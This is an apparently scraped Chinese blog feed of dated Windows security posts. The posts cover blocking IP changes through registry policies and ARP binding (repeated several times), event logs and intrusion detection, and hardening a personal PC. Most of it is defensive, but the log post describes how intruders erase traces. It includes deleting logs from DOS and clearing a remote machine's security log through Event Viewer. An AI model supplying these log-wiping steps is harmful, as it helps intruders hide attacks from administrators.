其次,再將控制面板窗口中的“網(wǎng)絡(luò)”圖標,隱藏起來,那么其他人根本就打不開TCP/IP參數(shù)設(shè)置界面了。只要你打開“Windows/Sys_tem(去掉"_")/netcpl.cpl”文件,然后在[don"t load]處,輸入一行形如“netcpl.cpl=no”的代碼,重新保存后,“網(wǎng)絡(luò)”圖標就從控制面板窗口中消失了。
到了這里,所有可以修改IP的途徑都被“切斷”了,這樣其他人即使想修改IP地址,也無處下手了。當然,這種方法只能蒙蒙菜鳥網(wǎng)民,對于“大蝦”級的網(wǎng)民來說,幾乎就是聾子的耳朵——擺設(shè)。因為網(wǎng)民一旦找到“netcpl.cpl”文件,還是有辦法恢復“網(wǎng)絡(luò)”或“網(wǎng)上鄰居”圖標的,為此,你還需要進行下面的工作,才能真正意義上“切斷”IP的修改通道:
依次展開注冊表中的“HKEY_CURRENT_USER”、“Software”、“Microsoft”、“Windows”、“CurrentVersion”、“Policies”、“Network”子鍵,然后在“Network”子鍵下面,創(chuàng)建一個名為“NoNetSetup”的雙字節(jié)值,并將它設(shè)置為“1”;之后,你再想打開“網(wǎng)上鄰居”或“網(wǎng)絡(luò)”屬性窗口時,將會得到無權(quán)訪問的提示。
局域網(wǎng)中各工作站的TCP/IP參數(shù)被隨意修改后,很容易造成IP地址的沖突,這會給管理工作帶來不小的麻煩。那么,有沒有辦法保護好自己的網(wǎng)絡(luò),不讓別人非法修改IP地址呢?
其實,很簡單,你只要參照下面的步驟,就能輕松避免IP地址被非法修改的麻煩!
注冊表設(shè)置法
首先,需要將桌面上的“網(wǎng)上鄰居”圖標隱藏起來,讓其他人無法通過“網(wǎng)上鄰居”屬性窗口,進入到TCP/IP參數(shù)設(shè)置界面。依次展開注冊表編輯窗口中的“HKEY_CURRENT_USER”、“Software”、“Microsoft”、“ Windows”、“CurrentVersion”、“Policies”、“Explorer”子鍵,然后在“Explorer”子鍵下面,創(chuàng)建一名為“NoNetHood”雙字節(jié)值,并將它設(shè)置為“1”,就可以了。
其次,再將控制面板窗口中的“網(wǎng)絡(luò)”圖標,隱藏起來,那么其他人根本就打不開TCP/IP參數(shù)設(shè)置界面了。只要你打開“Windows/Sys_tem(去掉"_")/netcpl.cpl”文件,然后在[don"t load]處,輸入一行形如“netcpl.cpl=no”的代碼,重新保存后,“網(wǎng)絡(luò)”圖標就從控制面板窗口中消失了。
到了這里,所有可以修改IP的途徑都被“切斷”了,這樣其他人即使想修改IP地址,也無處下手了。當然,這種方法只能蒙蒙菜鳥網(wǎng)民,對于“大蝦”級的網(wǎng)民來說,幾乎就是聾子的耳朵——擺設(shè)。因為網(wǎng)民一旦找到“netcpl.cpl”文件,還是有辦法恢復“網(wǎng)絡(luò)”或“網(wǎng)上鄰居”圖標的,為此,你還需要進行下面的工作,才能真正意義上“切斷”IP的修改通道:
依次展開注冊表中的“HKEY_CURRENT_USER”、“Software”、“Microsoft”、“Windows”、“CurrentVersion”、“Policies”、“Network”子鍵,然后在“Network”子鍵下面,創(chuàng)建一個名為“NoNetSetup”的雙字節(jié)值,并將它設(shè)置為“1”;之后,你再想打開“網(wǎng)上鄰居”或“網(wǎng)絡(luò)”屬性窗口時,將會得到無權(quán)訪問的提示。
地址綁定法
除了通過切斷修改IP的“通道”,來禁止其他人非法修改IP地址外,你也可以直接對指定IP地址,進行限制,讓其他人即使修改了地址,也無法進行網(wǎng)絡(luò)連接。在限制IP地址時,可以用地址綁定法來實現(xiàn):
首先將系統(tǒng)切換到DOS命令行狀態(tài)下,執(zhí)行“ipconfig /all”命令,在彈出的窗口中,將網(wǎng)卡的MAC地址、IP地址記錄下來;
下面在代理服務(wù)器端,將指定IP地址與對應(yīng)的MAC地址,綁定在一起,以后即使有人在你的計算機中,修改了IP地址,他也無法通過代理服務(wù)器,進行網(wǎng)絡(luò)連接。例如,在綁定前面的IP地址時,可以在DOS命令行中,執(zhí)行“arp -s 10.168.160.10 00-30-6E-36-5A-EF”命令,就能將靜態(tài)IP地址“10.168.160.10”和網(wǎng)卡的MAC地址“00-30-6E-36-5A-EF”綁定在一起了。
在局域網(wǎng)中,使用代理服務(wù)器上網(wǎng)的工作站,都能通過上述方法,來限制修改靜態(tài)IP地址。要是日后需要為IP地址“松綁”的話,只要執(zhí)行“arp -d 10.168.160.10 00-30-6E-36-5A-EF”命令就可以了。
要是你的局域網(wǎng),使用的是三層交換機來連接各個工作站的話,那么你只需要在每一個交換端口處,對IP地址進行一下限定,讓其他人即使修改了IP地址,也無法通過交換機上網(wǎng)。
其實,很簡單,你只要參照下面的步驟,就能輕松避免IP地址被非法修改的麻煩!
注冊表設(shè)置法
首先,需要將桌面上的“網(wǎng)上鄰居”圖標隱藏起來,讓其他人無法通過“網(wǎng)上鄰居”屬性窗口,進入到TCP/IP參數(shù)設(shè)置界面。依次展開注冊表編輯窗口中的“HKEY_CURRENT_USER”、“Software”、“Microsoft”、“ Windows”、“CurrentVersion”、“Policies”、“Explorer”子鍵,然后在“Explorer”子鍵下面,創(chuàng)建一名為“NoNetHood”雙字節(jié)值,并將它設(shè)置為“1”,就可以了。
其次,再將控制面板窗口中的“網(wǎng)絡(luò)”圖標,隱藏起來,那么其他人根本就打不開TCP/IP參數(shù)設(shè)置界面了。只要你打開“Windows/Sys_tem(去掉"_")/netcpl.cpl”文件,然后在[don"t load]處,輸入一行形如“netcpl.cpl=no”的代碼,重新保存后,“網(wǎng)絡(luò)”圖標就從控制面板窗口中消失了。
到了這里,所有可以修改IP的途徑都被“切斷”了,這樣其他人即使想修改IP地址,也無處下手了。當然,這種方法只能蒙蒙菜鳥網(wǎng)民,對于“大蝦”級的網(wǎng)民來說,幾乎就是聾子的耳朵——擺設(shè)。因為網(wǎng)民一旦找到“netcpl.cpl”文件,還是有辦法恢復“網(wǎng)絡(luò)”或“網(wǎng)上鄰居”圖標的,為此,你還需要進行下面的工作,才能真正意義上“切斷”IP的修改通道:
依次展開注冊表中的“HKEY_CURRENT_USER”、“Software”、“Microsoft”、“Windows”、“CurrentVersion”、“Policies”、“Network”子鍵,然后在“Network”子鍵下面,創(chuàng)建一個名為“NoNetSetup”的雙字節(jié)值,并將它設(shè)置為“1”;之后,你再想打開“網(wǎng)上鄰居”或“網(wǎng)絡(luò)”屬性窗口時,將會得到無權(quán)訪問的提示。
局域網(wǎng)中各工作站的TCP/IP參數(shù)被隨意修改后,很容易造成IP地址的沖突,這會給管理工作帶來不小的麻煩。那么,有沒有辦法保護好自己的網(wǎng)絡(luò),不讓別人非法修改IP地址呢?
其實,很簡單,你只要參照下面的步驟,就能輕松避免IP地址被非法修改的麻煩!
注冊表設(shè)置法
首先,需要將桌面上的“網(wǎng)上鄰居”圖標隱藏起來,讓其他人無法通過“網(wǎng)上鄰居”屬性窗口,進入到TCP/IP參數(shù)設(shè)置界面。依次展開注冊表編輯窗口中的“HKEY_CURRENT_USER”、“Software”、“Microsoft”、“ Windows”、“CurrentVersion”、“Policies”、“Explorer”子鍵,然后在“Explorer”子鍵下面,創(chuàng)建一名為“NoNetHood”雙字節(jié)值,并將它設(shè)置為“1”,就可以了。
其次,再將控制面板窗口中的“網(wǎng)絡(luò)”圖標,隱藏起來,那么其他人根本就打不開TCP/IP參數(shù)設(shè)置界面了。只要你打開“Windows/Sys_tem(去掉"_")/netcpl.cpl”文件,然后在[don"t load]處,輸入一行形如“netcpl.cpl=no”的代碼,重新保存后,“網(wǎng)絡(luò)”圖標就從控制面板窗口中消失了。
到了這里,所有可以修改IP的途徑都被“切斷”了,這樣其他人即使想修改IP地址,也無處下手了。當然,這種方法只能蒙蒙菜鳥網(wǎng)民,對于“大蝦”級的網(wǎng)民來說,幾乎就是聾子的耳朵——擺設(shè)。因為網(wǎng)民一旦找到“netcpl.cpl”文件,還是有辦法恢復“網(wǎng)絡(luò)”或“網(wǎng)上鄰居”圖標的,為此,你還需要進行下面的工作,才能真正意義上“切斷”IP的修改通道:
依次展開注冊表中的“HKEY_CURRENT_USER”、“Software”、“Microsoft”、“Windows”、“CurrentVersion”、“Policies”、“Network”子鍵,然后在“Network”子鍵下面,創(chuàng)建一個名為“NoNetSetup”的雙字節(jié)值,并將它設(shè)置為“1”;之后,你再想打開“網(wǎng)上鄰居”或“網(wǎng)絡(luò)”屬性窗口時,將會得到無權(quán)訪問的提示。
地址綁定法
除了通過切斷修改IP的“通道”,來禁止其他人非法修改IP地址外,你也可以直接對指定IP地址,進行限制,讓其他人即使修改了地址,也無法進行網(wǎng)絡(luò)連接。在限制IP地址時,可以用地址綁定法來實現(xiàn):
首先將系統(tǒng)切換到DOS命令行狀態(tài)下,執(zhí)行“ipconfig /all”命令,在彈出的窗口中,將網(wǎng)卡的MAC地址、IP地址記錄下來;
下面在代理服務(wù)器端,將指定IP地址與對應(yīng)的MAC地址,綁定在一起,以后即使有人在你的計算機中,修改了IP地址,他也無法通過代理服務(wù)器,進行網(wǎng)絡(luò)連接。例如,在綁定前面的IP地址時,可以在DOS命令行中,執(zhí)行“arp -s 10.168.160.10 00-30-6E-36-5A-EF”命令,就能將靜態(tài)IP地址“10.168.160.10”和網(wǎng)卡的MAC地址“00-30-6E-36-5A-EF”綁定在一起了。
在局域網(wǎng)中,使用代理服務(wù)器上網(wǎng)的工作站,都能通過上述方法,來限制修改靜態(tài)IP地址。要是日后需要為IP地址“松綁”的話,只要執(zhí)行“arp -d 10.168.160.10 00-30-6E-36-5A-EF”命令就可以了。
要是你的局域網(wǎng),使用的是三層交換機來連接各個工作站的話,那么你只需要在每一個交換端口處,對IP地址進行一下限定,讓其他人即使修改了IP地址,也無法通過交換機上網(wǎng)。
系統(tǒng)安全防范之Windows日志與入侵檢測
[ 2007-03-25 03:49:28 | 作者: sun ]
一、日志文件的特殊性
要了解日志文件,首先就要從它的特殊性講起,說它特殊是因為這個文件由系統(tǒng)管理,并加以保護,一般情況下普通用戶不能隨意更改。我們不能用針對普通TXT文件的編輯方法來編輯它。例如WPS系列、Word系列、寫字板、Edit等等,都奈何它不得。我們甚至不能對它進行“重命名”或“刪除”、“移動”操作,否則系統(tǒng)就會很不客氣告訴你:訪問被拒絕。當然,在純DOS的狀態(tài)下,可以對它進行一些常規(guī)操作(例如Win98狀態(tài)下),但是你很快就會發(fā)現(xiàn),你的修改根本就無濟于事,當重新啟動Windows 98時,系統(tǒng)將會自動檢查這個特殊的文本文件,若不存在就會自動產(chǎn)生一個;若存在的話,將向該文本追加日志記錄。
二、黑客為什么會對日志文件感興趣
黑客們在獲得服務(wù)器的系統(tǒng)管理員權(quán)限之后就可以隨意破壞系統(tǒng)上的文件了,包括日志文件。但是這一切都將被系統(tǒng)日志所記錄下來,所以黑客們想要隱藏自己的入侵蹤跡,就必須對日志進行修改。最簡單的方法就是刪除系統(tǒng)日志文件,但這樣做一般都是初級黑客所為,真正的高級黑客們總是用修改日志的方法來防止系統(tǒng)管理員追蹤到自己,網(wǎng)絡(luò)上有很多專門進行此類功能的程序,例如Zap、Wipe等。
三、Windows系列日志系統(tǒng)簡介
1.Windows 98的日志文件
因目前絕大多數(shù)的用戶還是使用的操作系統(tǒng)是Windows 98,所以本節(jié)先從Windows 98的日志文件講起。Windows 98下的普通用戶無需使用系統(tǒng)日志,除非有特殊用途,例如,利用Windows 98建立個人Web服務(wù)器時,就會需要啟用系統(tǒng)日志來作為服務(wù)器安全方面的參考,當已利用Windows 98建立個人Web服務(wù)器的用戶,可以進行下列操作來啟用日志功能。
(1)在“控制面板”中雙擊“個人Web服務(wù)器”圖標;(必須已經(jīng)在配置好相關(guān)的網(wǎng)絡(luò)協(xié)議,并添加“個人Web服務(wù)器”的情況下)。
(2)在“管理”選項卡中單擊“管理”按鈕;
(3)在“Internet服務(wù)管理員”頁中單擊“WWW管理”;
(4)在“WWW管理”頁中單擊“日志”選項卡;
(5)選中“啟用日志”復選框,并根據(jù)需要進行更改。 將日志文件命名為“Inetserver_event.log”。如果“日志”選項卡中沒有指定日志文件的目錄,則文件將被保存在Windows文件夾中。
普通用戶可以在Windows 98的系統(tǒng)文件夾中找到日志文件schedlog.txt。我們可以通過以下幾種方法找到它。在“開始”/“查找”中查找到它,或是啟動“任務(wù)計劃程序”,在“高級”菜單中單擊“查看日志”來查看到它。Windows 98的普通用戶的日志文件很簡單,只是記錄了一些預先設(shè)定的任務(wù)運行過程,相對于作為服務(wù)器的NT操作系統(tǒng),真正的黑客們很少對Windows 98發(fā)生興趣。所以Windows 98下的日志不為人們所重視。
2.Windows NT下的日志系統(tǒng)
Windows NT是目前受到攻擊較多的操作系統(tǒng),在Windows NT中,日志文件幾乎對系統(tǒng)中的每一項事務(wù)都要做一定程度上的審計。Windows NT的日志文件一般分為三類:
系統(tǒng)日志 :跟蹤各種各樣的系統(tǒng)事件,記錄由 Windows NT 的系統(tǒng)組件產(chǎn)生的事件。例如,在啟動過程加載驅(qū)動程序錯誤或其它系統(tǒng)組件的失敗記錄在系統(tǒng)日志中。
應(yīng)用程序日志:記錄由應(yīng)用程序或系統(tǒng)程序產(chǎn)生的事件,比如應(yīng)用程序產(chǎn)生的裝載dll(動態(tài)鏈接庫)失敗的信息將出現(xiàn)在日志中。
安全日志 :記錄登錄上網(wǎng)、下網(wǎng)、改變訪問權(quán)限以及系統(tǒng)啟動和關(guān)閉等事件以及與創(chuàng)建、打開或刪除文件等資源使用相關(guān)聯(lián)的事件。利用系統(tǒng)的“事件管理器”可以指定在安全日志中記錄需要記錄的事件,安全日志的默認狀態(tài)是關(guān)閉的。
Windows NT的日志系統(tǒng)通常放在下面的位置,根據(jù)操作系統(tǒng)的不同略有變化。
C:\systemroot\system32\config\sysevent.evt
C:\systemroot\system32\config\secevent.evt
C:\systemroot\system32\config\appevent.evt
Windows NT使用了一種特殊的格式存放它的日志文件,這種格式的文件可以被事件查看器讀取,事件查看器可以在“控制面板”中找到,系統(tǒng)管理員可以使用事件查看器選擇要查看的日志條目,查看條件包括類別、用戶和消息類型。
3.Windows 2000的日志系統(tǒng)
與Windows NT一樣,Windows 2000中也一樣使用“事件查看器”來管理日志系統(tǒng),也同樣需要用系統(tǒng)管理員身份進入系統(tǒng)后方可進行操作,如圖7-1所示。
在Windows 2000中,日志文件的類型比較多,通常有應(yīng)用程序日志,安全日志、系統(tǒng)日志、DNS服務(wù)器日志、FTP日志、WWW日志等等,可能會根據(jù)服務(wù)器所開啟的服務(wù)不同而略有變化。啟動Windows 2000時,事件日志服務(wù)會自動啟動,所有用戶都可以查看“應(yīng)用程序日志”,但是只有系統(tǒng)管理員才能訪問“安全日志”和“系統(tǒng)日志”。系統(tǒng)默認的情況下會關(guān)閉“安全日志”,但我們可以使用“組策略”來啟用“安全日志”開始記錄。安全日志一旦開啟,就會無限制的記錄下去,直到裝滿時停止運行。
Windows 2000日志文件默認位置:
應(yīng)用程序日志、安全日志、系統(tǒng)日志、DNS日志默認位置:%systemroot%\sys tem32\config,默認文件大小512KB,但有經(jīng)驗的系統(tǒng)管理員往往都會改變這個默認大小。
安全日志文件:c:\sys temroot\sys tem32\config\SecEvent.EVT
系統(tǒng)日志文件:c:\sys temroot\sys tem32\config\SysEvent.EVT
應(yīng)用程序日志文件:c:\sys temroot\sys tem32\config\AppEvent.EVT
Internet信息服務(wù)FTP日志默認位置:c:\systemroot\sys tem32\logfiles\msftpsvc1\。
Internet信息服務(wù)WWW日志默認位置:c:\systemroot\sys tem32\logfiles\w3svc1\。
Scheduler服務(wù)器日志默認位置:c:\systemroot\schedlgu.txt 。該日志記錄了訪問者的IP,訪問的時間及請求訪問的內(nèi)容。
因Windows2000延續(xù)了NT的日志文件,并在其基礎(chǔ)上又增加了FTP和WWW日志,故本節(jié)對FTP日志和WWW日志作一個簡單的講述。FTP日志以文本形式的文件詳細地記錄了以FTP方式上傳文件的文件、來源、文件名等等。不過由于該日志太明顯,所以高級黑客們根本不會用這種方法來傳文件,取而代之的是使用RCP。FTP日志文件和WWW日志文件產(chǎn)生的日志一般在c:\sys temroot\system32\LogFiles\W3SVC1目錄下,默認是每天一個日志文件,
FTP和WWW日志可以刪除,但是FTP日志所記錄的一切還是會在系統(tǒng)日志和安全日志里記錄下來,如果用戶需要嘗試刪除這些文件,通過一些并不算太復雜的方法,例如首先停止某些服務(wù),然后就可以將該日志文件刪除。具體方法本節(jié)略。
Windows 2000中提供了一個叫做安全日志分析器(CyberSafe Log Analyst,CLA)的工具,有很強的日志管理功能,它可以使用戶不必在讓人眼花繚亂的日志中慢慢尋找某條記錄,而是通過分類的方式將各種事件整理好,讓用戶能迅速找到所需要的條目。它的另一個突出特點是能夠?qū)φ麄€網(wǎng)絡(luò)環(huán)境中多個系統(tǒng)的各種活動同時進行分析,避免了一個個單獨去分析的麻煩。
4.Windows XP日志文件
說Windows XP的日志文件,就要先說說Internet連接防火墻(ICF)的日志,ICF的日志可以分為兩類:一類是ICF審核通過的IP數(shù)據(jù)包,而一類是ICF拋棄的IP數(shù)據(jù)包。日志一般存于Windows目錄之下,文件名是pfirewall.log。其文件格式符合W3C擴展日志文件格式(W3C Extended Log File Format),分為兩部分,分別是文件頭(Head Information)和文件主體(Body Information)。文件頭主要是關(guān)于Pfirewall.log這個文件的說明,需要注意的主要是文件主體部分。文件主體部分記錄有每一個成功通過ICF審核或者被ICF所拋棄的IP數(shù)據(jù)包的信息,包括源地址、目的地址、端口、時間、協(xié)議以及其他一些信息。理解這些信息需要較多的TCP/IP協(xié)議的知識。ICF生成安全日志時使用的格式是W3C擴展日志文件格式,這與在常用日志分析工具中使用的格式類似。 當我們在WindowsXP的“控制面板”中,打開事件查看器.
就可以看到WindowsXP中同樣也有著系統(tǒng)日志、安全日志和應(yīng)用日志三種常見的日志文件,當你單擊其中任一文件時,就可以看見日志文件中的一些記錄.
若要啟用對不成功的連接嘗試的記錄,請選中“記錄丟棄的數(shù)據(jù)包”復選框,否則禁用。另外,我們還可以用金山網(wǎng)鏢等工具軟件將“安全日志”導出和被刪除。
5.日志分析
當日志每天都忠實的為用戶記錄著系統(tǒng)所發(fā)生的一切的時候,用戶同樣也需要經(jīng)常規(guī)范管理日志,但是龐大的日志記錄卻又令用戶茫然失措,此時,我們就會需要使用工具對日志進行分析、匯總,日志分析可以幫助用戶從日志記錄中獲取有用的信息,以便用戶可以針對不同的情況采取必要的措施。
6.系統(tǒng)日志的刪除
因操作系統(tǒng)的不同,所以日志的刪除方法也略有變化,本文從Windows 98和Windows 2000兩種有明顯區(qū)別的操作系統(tǒng)來講述日志的刪除。
7.Windows 98下的日志刪除
在純DOS下啟動計算機,用一些常用的修改或刪除命令就可以消除Windows 98日志記錄。當重新啟動Windows98后,系統(tǒng)會檢查日志文件的存在,如果發(fā)現(xiàn)日志文件不存在,系統(tǒng)將自動重建一個,但原有的日志文件將全部被消除。
8.Windows 2000的日志刪除
Windows 2000的日志可就比Windows 98復雜得多了,我們知道,日志是由系統(tǒng)來管理、保護的,一般情況下是禁止刪除或修改,而且它還與注冊表密切相關(guān)。在Windows 2000中刪除日志首先要取得系統(tǒng)管理員權(quán)限,因為安全日志和系統(tǒng)日志必須由系統(tǒng)管理員方可查看,然后才可以刪除它們。
我們將針對應(yīng)用程序日志,安全日志、系統(tǒng)日志、DNS服務(wù)器日志、FTP日志、WWW日志的刪除做一個簡單的講解。要刪除日志文件,就必須停止系統(tǒng)對日志文件的保護功能。我們可以使用命令語句來刪除除了安全日志和系統(tǒng)日志外的日志文件,但安全日志就必須要使用系統(tǒng)中的“事件查看器”來控制它,打開“控制面板”的“管理工具”中的“事件查看器”。在菜單的“操作”項有一個名為“連接到另一臺計算機”的菜單.
輸入遠程計算機的IP,然后需要等待,選擇遠程計算機的安全性日志,點擊屬性里的“清除日志”按鈕即可。
9.發(fā)現(xiàn)入侵蹤跡
如何當入侵者企圖或已經(jīng)進行系統(tǒng)的時候,及時有效的發(fā)現(xiàn)蹤跡是目前防范入侵的熱門話題之一。發(fā)現(xiàn)入侵蹤跡的前題就是應(yīng)該有一個入侵特征數(shù)據(jù)庫,我們一般使用系統(tǒng)日志、防火墻、檢查IP報頭(IP header)的來源地址、檢測Email的安全性以及使用入侵檢測系統(tǒng)(IDS)等來判斷是否有入侵跡象。
我們先來學習一下如何利用端口的常識來判斷是否有入侵跡象:
電腦在安裝以后,如果不加以調(diào)整,其默認開放的端口號是139,如果不開放其它端口的話,黑客正常情況下是無法進入系統(tǒng)的。如果平常系統(tǒng)經(jīng)常進行病毒檢查的話,而突然間電腦上網(wǎng)的時候會感到有反應(yīng)緩慢、鼠標不聽使喚、藍屏、系統(tǒng)死機及其它種種不正常的情況,我們就可以判斷有黑客利用電子信件或其它方法在系統(tǒng)中植入的特洛伊木馬。此時,我們就可以采取一些方法來清除它,具體方法在本書的相關(guān)章節(jié)可以查閱。
10.遭受入侵時的跡象
入侵總是按照一定的步驟在進行,有經(jīng)驗的系統(tǒng)管理員完全可以通過觀察到系統(tǒng)是否出現(xiàn)異常現(xiàn)象來判斷入侵的程度。
11.掃描跡象
當系統(tǒng)收到連續(xù)、反復的端口連接請求時,就可能意味著入侵者正在使用端口掃描器對系統(tǒng)進行外部掃描。高級黑客們可能會用秘密掃描工具來躲避檢測,但實際上有經(jīng)驗的系統(tǒng)管理員還是可以通過多種跡象來判斷一切。
12.利用攻擊
當入侵者使用各種程序?qū)ο到y(tǒng)進行入侵時,系統(tǒng)可能報告出一些異常情況,并給出相關(guān)文件(IDS常用的處理方法),當入侵者入侵成功后,系統(tǒng)總會留下或多或少的破壞和非正常訪問跡象,這時就應(yīng)該發(fā)現(xiàn)系統(tǒng)可能已遭遇入侵。
打造100%絕對安全的個人電腦
[ 2007-03-25 03:49:03 | 作者: sun ]
細想一下,現(xiàn)在大多數(shù)人的電腦這只未必安全,真好閑暇無事,特發(fā)此帖,希望對大家有所幫助!!!
由于現(xiàn)在家用電腦所使用的操作系統(tǒng)多數(shù)為WinXP 和Win2000 pro(建議還在使用98的朋友換換系統(tǒng),連_blank/>微軟都放棄了的系統(tǒng)你還用它干嘛?)所以后面我將主要講一下基于這兩個操作系統(tǒng)的安全防范。
個人電腦常見的被入侵方式
談到個人上網(wǎng)時的安全,還是先把大家可能會遇到的問題歸個類吧。我們遇到的入侵方式大概包括了以下幾種:
(1) 被他人盜取密碼;
(2) 系統(tǒng)被_blank/>木馬攻擊;
(3) 瀏覽網(wǎng)頁時被惡意的java scrpit程序攻擊;
(4) QQ被攻擊或泄漏信息;
(5) 病毒感染;
(6) 系統(tǒng)存在漏洞使他人攻擊自己。
(7) _blank/>黑客的惡意攻擊。
下面我們就來看看通過什么樣的手段來更有效的防范攻擊。
查本地共享資源
刪除共享
刪除ipc$空連接
賬號密碼的安全原則
關(guān)閉自己的139端口
445端口的關(guān)閉
3389的關(guān)閉
4899的防范
常見端口的介紹
如何查看本機打開的端口和過濾
禁用服務(wù)
本地策略
本地安全策略
用戶權(quán)限分配策略
終端服務(wù)配置
用戶和組策略
防止rpc漏洞
自己動手DIY在本地策略的安全選項
工具介紹
避免被惡意代碼 木馬等病毒攻擊
1.查看本地共享資源
運行CMD輸入net share,如果看到有異常的共享,那么應(yīng)該關(guān)閉。但是有時你關(guān)閉共享下次開機的時候又出現(xiàn)了,那么你應(yīng)該考慮一下,你的機器是否已經(jīng)被黑客所控制了,或者中了病毒。
2.刪除共享(每次輸入一個)
net share admin$ /delete
net share c$ /delete
net share d$ /delete(如果有e,f,……可以繼續(xù)刪除)
3.刪除ipc$空連接
在運行內(nèi)輸入regedit,在_blank/>注冊表中找到 HKEY-LOCAL_MACHINESYSTEMCurrentControSetControlLSA 項里數(shù)值名稱RestrictAnonymous的數(shù)值數(shù)據(jù)由0改為1。
4.關(guān)閉自己的139端口,ipc和RPC漏洞存在于此。
關(guān)閉139端口的方法是在“網(wǎng)絡(luò)和撥號連接”中“本地連接”中選取“Internet協(xié)議(TCP/IP)”屬性,進入“高級TCP/IP設(shè)置”“WinS設(shè)置”里面有一項“禁用TCP/IP的NETBIOS”,打勾就關(guān)閉了139端口。
5.防止rpc漏洞
打開管理工具——服務(wù)——找到RPC(Remote Procedure Call (RPC) Locator)服務(wù)——將故障恢復中的第一次失敗,第二次失敗,后續(xù)失敗,都設(shè)置為不操作。
XP SP2和2000 pro sp4,均不存在該漏洞。
6.445端口的關(guān)閉
修改注冊表,添加一個鍵值
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NetBT\Parameters在右面的窗口建立一個SMBDeviceEnabled 為REG_DWORD類型鍵值為0這樣就ok了。
7.3389的關(guān)閉
XP:我的電腦上點右鍵選屬性--/>遠程,將里面的遠程協(xié)助和遠程桌面兩個選項框里的勾去掉。
Win2000server 開始--/>程序--/>管理工具--/>服務(wù)里找到Terminal Services服務(wù)項,選中屬性選項將啟動類型改成手動,并停止該服務(wù)。(該方法在XP同樣適用)
使用2000 pro的朋友注意,網(wǎng)絡(luò)上有很多文章說在Win2000pro 開始--/>設(shè)置--/>控制面板--/>管理工具--/>服務(wù)里找到Terminal Services服務(wù)項,選中屬性選項將啟動類型改成手動,并停止該服務(wù),可以關(guān)閉3389,其實在2000pro 中根本不存在Terminal Services。
8.4899的防范
網(wǎng)絡(luò)上有許多關(guān)于3389和4899的入侵方法。4899其實是一個遠程控制軟件所開啟的服務(wù)端端口,由于這些控制軟件功能強大,所以經(jīng)常被黑客用來控制自己的肉雞,而且這類軟件一般不會被殺毒軟件查殺,比后門還要安全。
4899不象3389那樣,是系統(tǒng)自帶的服務(wù)。需要自己安裝,而且需要將服務(wù)端上傳到入侵的電腦并運行服務(wù),才能達到控制的目的。
所以只要你的電腦做了基本的安全配置,黑客是很難通過4899來控制你的。
9、禁用服務(wù)
若PC沒有特殊用途,基于安全考慮,打開控制面板,進入管理工具——服務(wù),關(guān)閉以下服務(wù):
1.Alerter[通知選定的用戶和計算機管理警報]
2.ClipBook[啟用“剪貼簿查看器”儲存信息并與遠程計算機共享]
3.Distributed File System[將分散的文件共享合并成一個邏輯名稱,共享出去,關(guān)閉后遠程計算機無法訪問共享
4.Distributed Link Tracking Server[適用局域網(wǎng)分布式鏈接]
5.Indexing Service[提供本地或遠程計算機上文件的索引內(nèi)容和屬性,泄露信息]
6.Messenger[警報]
7.NetMeeting Remote Desktop Sharing[netmeeting公司留下的客戶信息收集]
8.Network DDE[為在同一臺計算機或不同計算機上運行的程序提供動態(tài)數(shù)據(jù)交換]
9.Network DDE DSDM[管理動態(tài)數(shù)據(jù)交換 (DDE) 網(wǎng)絡(luò)共享]
10.Remote Desktop Help Session Manager[管理并控制遠程協(xié)助]
11.Remote Registry[使遠程計算機用戶修改本地注冊表]
12.Routing and Remote Access[在局域網(wǎng)和廣域往提供路由服務(wù).黑客理由路由服務(wù)刺探注冊信息]
13.Server[支持此計算機通過網(wǎng)絡(luò)的文件、打印、和命名管道共享]
14.TCP/IPNetBIOS Helper[提供 TCP/IP 服務(wù)上的 NetBIOS 和網(wǎng)絡(luò)上客戶端的 NetBIOS 名稱解析的支持而使用戶能夠共享文件、打印和登錄到網(wǎng)絡(luò)]
15.Telnet[允許遠程用戶登錄到此計算機并運行程序]
16.Terminal Services[允許用戶以交互方式連接到遠程計算機]
17.Window s Image Acquisition (WIA)[照相服務(wù),應(yīng)用與數(shù)碼攝象機]
如果發(fā)現(xiàn)機器開啟了一些很奇怪的服務(wù),如r_server這樣的服務(wù),必須馬上停止該服務(wù),因為這完全有可能是黑客使用控制程序的服務(wù)端。
10、賬號密碼的安全原則
首先禁用guest帳號,將系統(tǒng)內(nèi)建的administrator帳號改名~~(改的越復雜越好,最好改成中文的),然后設(shè)置一個密碼,最好是8位以上字母數(shù)字符號組合。 (讓那些該死的黑客慢慢猜去吧~)
如果你使用的是其他帳號,最好不要將其加進administrators,如果加入administrators組,一定也要設(shè)置一個足夠安全的密碼,同上如果你設(shè)置adminstrator的密碼時,最好在安全模式下設(shè)置,因為經(jīng)我研究發(fā)現(xiàn),在系統(tǒng)中擁有最高權(quán)限的帳號,不是正常登陸下的adminitrator帳號,因為即使有了這個帳號,同樣可以登陸安全模式,將sam文件刪除,從而更改系統(tǒng)的administrator的密碼!而在安全模式下設(shè)置的administrator則不會出現(xiàn)這種情況,因為不知道這個administrator密碼是無法進入安全模式。權(quán)限達到最大這個是密碼策略:用戶可以根據(jù)自己的習慣設(shè)置密碼,下面是我建議的設(shè)置(關(guān)于密碼安全設(shè)置,我上面已經(jīng)講了,這里不再羅嗦了。
打開管理工具.本地安全設(shè)置.密碼策略
1.密碼必須符合復雜要求性.啟用
2.密碼最小值.我設(shè)置的是8
3.密碼最長使用期限.我是默認設(shè)置42天
4.密碼最短使用期限0天
5.強制密碼歷史 記住0個密碼
6.用可還原的_blank/>加密來存儲密碼 禁用
11、本地策略:
這個很重要,可以幫助我們發(fā)現(xiàn)那些心存叵測的人的一舉一動,還可以幫助我們將來追查黑客。
(雖然一般黑客都會在走時會清除他在你電腦中留下的痕跡,不過也有一些不小心的)
打開管理工具
找到本地安全設(shè)置.本地策略.審核策略
1.審核策略更改 成功失敗
2.審核登陸事件 成功失敗
3.審核對象訪問 失敗
4.審核跟蹤過程 無審核
5.審核目錄服務(wù)訪問 失敗
6.審核特權(quán)使用 失敗
7.審核系統(tǒng)事件 成功失敗
8.審核帳戶登陸時間 成功失敗
9.審核帳戶管理 成功失敗
&nb sp;然后再到管理工具找到
事件查看器
應(yīng)用程序:右鍵/>屬性/>設(shè)置日志大小上限,我設(shè)置了50mb,選擇不覆蓋事件
安全性:右鍵/>屬性/>設(shè)置日志大小上限,我也是設(shè)置了50mb,選擇不覆蓋事件
系統(tǒng):右鍵/>屬性/>設(shè)置日志大小上限,我都是設(shè)置了50mb,選擇不覆蓋事件
12、本地安全策略:
打開管理工具
找到本地安全設(shè)置.本地策略.安全選項
